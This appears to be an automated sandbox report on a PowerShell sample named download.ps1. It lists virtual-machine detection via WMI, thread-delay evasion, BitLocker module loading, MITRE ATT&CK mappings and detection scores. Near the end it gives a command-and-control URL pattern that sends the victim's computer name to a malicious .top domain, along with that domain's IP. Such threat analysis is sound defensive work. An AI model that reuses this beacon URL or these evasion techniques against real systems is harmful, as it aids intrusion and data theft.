Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1795254706.0000022F3A8D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb3 source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbOWD1 source: powershell.exe, 00000000.00000002.1797817107.0000022F3B098000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb9-00C04FB68820}\InprocServer32H source: powershell.exe, 00000000.00000002.1796663905.0000022F3AFFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1796663905.0000022F3AF5D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbf source: powershell.exe, 00000000.00000002.1797817107.0000022F3B066000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B76D2A5 pushad ; iretd 0_2_00007FFD9B76D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B95D114 push eax; iretd 0_2_00007FFD9B95D115
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAF7163 push edi; iretd 0_2_00007FFD9BAF7166
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAF0D5C pushad ; ret 0_2_00007FFD9BAF0D5D

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5989Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3911Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1797817107.0000022F3B109000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware`S
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.1798862238.0000022F3B130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.1757938142.0000022F234EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		121
Virtualization/Sandbox Evasion		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager121
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
download.ps18%ReversingLabs
download.ps116%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crl.microsoft&0%Avira URL Cloudsafe
http://$byv6103m9dkfxgj/$x1pqhoetanrl2cv.php?id=$env:computername&key=$kiewrcbop&s=5270%Avira URL Cloudsafe
http://kcehmenjdibnmni.top0%Avira URL Cloudsafe
http://0.google.com/0%Avira URL Cloudsafe
http://0.google.0%Avira URL Cloudsafe
https://0.google0%Avira URL Cloudsafe
http://kcehmenjdibnmni.top/trzyoqslw6htr.php?id=user-PC&key=43809224344&s=5270%Avira URL Cloudsafe
https://0.google.com/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.185.164
truefalse
    		high
    kcehmenjdibnmni.top
    		45.61.136.138
    		truetrue
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
